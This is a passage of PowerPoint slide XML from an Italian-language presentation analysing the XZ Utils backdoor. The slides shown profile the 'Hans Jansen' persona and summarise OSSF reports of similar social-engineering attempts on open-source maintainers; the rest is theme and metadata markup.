      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="42165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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hans Jansen?</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hans Jansen compare tre volte:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>22 Giugno 2023 sottopone delle patch che vengono prima accettate e poi revocate da Lasse Collin. Vengono successivamente accettate da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan. Queste patch, riguardanti IFUNC, contribuiscono all'hook per la backdoor;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>25 Marzo 2024: Hans Jansen invia la segnalazione di un bug a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, chiedendo che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> venga aggiornata a 5.6.1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anche questo profilo non trova riscontri rilevanti nell'internet. Tuttavia, non ha comportamenti sociali rilevanti, ma si limita solo al ruolo di sviluppatore.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1880412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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" dirty="0"/>
              <a:t> Cosa sappiamo oggi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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1938705"/>
            <a:ext cx="11853204" cy="458587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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Indagini OSSF</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non sembra un caso isolato. La Open Source Security Foundation ha emanato un avviso in merito ad indagini su altri incidenti social-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>driven</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di questo tipo, come nel caso della </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Foundation, dove altri attori volevano che </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OpenJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> li designasse come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, seguendo pattern comportamentali simili a quelli di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Altri due progetti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t> hanno segnalato pattern di questo tipo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questi attacchi di social engineering fanno leva sul senso di dovere del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lasse Collin ha detto una frase che può riassumere il peso di essere un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D1B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D1D1B"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>It’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> good to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>keep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> in mind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>unpaid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="595D69"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> hobby project”</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2128879252"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="PortalVTI">
  <a:themeElements>
    <a:clrScheme name="PortalVTI">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="051618"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E8E8DF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="2D714C"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="1F7985"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="0D6756"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="40945E"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="389896"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="64924A"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="1F855C"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="227390"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="PortalVTI">
      <a:majorFont>
        <a:latin typeface="Trade Gothic Next Cond"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Trade Gothic Next Light"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:minorFont>
    </a:fontScheme>
    <a:fmtScheme name="PortalVTI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rtalVTI" id="{E3A4BB4D-5227-4A6D-99D3-DBAB0FE4C68F}" vid="{BE515EFD-5A7A-4BFE-BE06-A21DB8499CD2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Celestial</Template>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Slides>100</Slides>
  <Notes>1</Notes>
  <HiddenSlides>0</HiddenSlides>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Tema</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Titoli diapositive</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>100</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="101" baseType="lpstr">
      <vt:lpstr>PortalVTI</vt:lpstr>
      <vt:lpstr>XZ UtilS Backdoor</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr> Introduzione</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr> La scoperta di andres freund</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr> La strategia di jia tan</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr> Struttura della backdoor</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr> Forme di mitigazione</vt:lpstr>
      <vt:lpstr>  sommario</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi</vt:lpstr>
      <vt:lpstr> Cosa sappiamo oggi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/>
  <cp:revision>1565</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-20T19:57:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-08T04:07:46Z</dcterms:modified>
</cp:coreProperties>
</file>